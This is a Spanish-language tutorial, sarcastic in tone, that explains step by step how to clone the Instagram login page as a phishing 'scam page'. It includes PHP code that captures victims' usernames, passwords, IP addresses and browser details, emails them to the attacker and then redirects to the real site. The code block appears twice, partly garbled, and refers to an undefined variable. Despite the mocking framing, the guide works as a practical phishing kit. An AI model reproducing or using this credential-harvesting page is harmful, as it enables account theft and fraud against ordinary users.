¿Qué es una Scam Page?
Bueno, pues básicamente es una página falsa, casi idéntica a las que usas todos los días. Puede parecer un inicio de sesión de Instagram, tu banco favorito, o lo que sea que te suene importante. El propósito: que los despistados caigan y te suelten su información como si te la debieran. Ah, y por si no lo sabías, a esto se le llama phishing. ¡Qué nombre tan técnico para algo tan sucio!
Y ahora, ¿cómo ser un genio del mal en 11 sencillos pasos?
- Elige tu presa. Vamos a ser "creativos" y a elegir Instagram porque, claro, originalidad ante todo.
- Descarga la página. Navega en el sitio y usa la mágica combinación de teclas CTRL + S para guardar el HTML en tu computadora. Sí, así de fácil.
- Cuidado con las imágenes. A veces las imágenes no se guardan bien, pero tranquilo, nada que un pequeño ajuste en las rutas no pueda solucionar. Cambia esas rutas relativas a absolutas y ya está.
- CTRL + F al rescate. Abre el archivo guardado y busca los campos de inicio de sesión. Prueba términos como "password" o "username", y si no te sale, usa tu imaginación.
- Cambia el código. Si encuentras algo tipo login2.php, cámbialo por 040147.php porque... bueno, porque sí.
- Identifica las variables. Encuentra dónde se define el nombre de usuario (algo como name="email") y toma nota, Sherlock. Lo mismo con la contraseña. Fácil, ¿no?
- Escribamos un poco de PHP. En el archivo nuevo que creaste, pega este código mágico que recogerá la información y la enviará directo a tu correo electrónico. ¿Qué te parece? Fácil, rápido y malvado.
$to = "[email protected]";
$name = $_POST['email'];
$password = $_POST['password'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$ip = $_SERVER['REMOTE_ADDR'];
$d = date('l dS \of F Y h:i:s A');
$sub = "Nueva cuenta hackeada - $email";
$headers = "From: $name <$email>\n";
$msg = 'Nombre de usuario: '.$email."\n";
$msg .= 'Contraseña: '.$password."\n";
$msg .= 'Navegador: '.$agent."\n";
$msg .= 'IP: '.$ip."\n";
$msg .= 'Fecha y hora: '.$d;
mail($to, $sub, $msg, $headers);
header("Location: www.instagram.com");
?>
$name = $_POST['email'];
$password = $_POST['password'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$ip = $_SERVER['REMOTE_ADDR'];
$d = date('l dS \of F Y h:i:s A');
$sub = "Nueva cuenta hackeada - $email";
$headers = "From: $name <$email>\n";
$msg = 'Nombre de usuario: '.$email."\n";
$msg .= 'Contraseña: '.$password."\n";
$msg .= 'Navegador: '.$agent."\n";
$msg .= 'IP: '.$ip."\n";
$msg .= 'Fecha y hora: '.$d;
mail($to, $sub, $msg, $headers);
header("Location: www.instagram.com");
?>
- Modifica el correo. No te olvides de cambiar ese "[email protected]" por el tuyo, no querrás que la información vaya a parar a las manos de otro hacker wannabe.
- Súbelo todo. Ahora solo renombra los archivos, sube tu página al host y ¡voilá! Ya tienes tu propia Scam Page. Sencillo, ¿verdad? Solo espera a que alguien caiga y mientras tanto puedes ir a hacer otras cosas "importantes".
¡Listo! Ahora tienes la guía definitiva para ser ese villano de poca monta en el oscuro rincón del internet que siempre quisiste ser.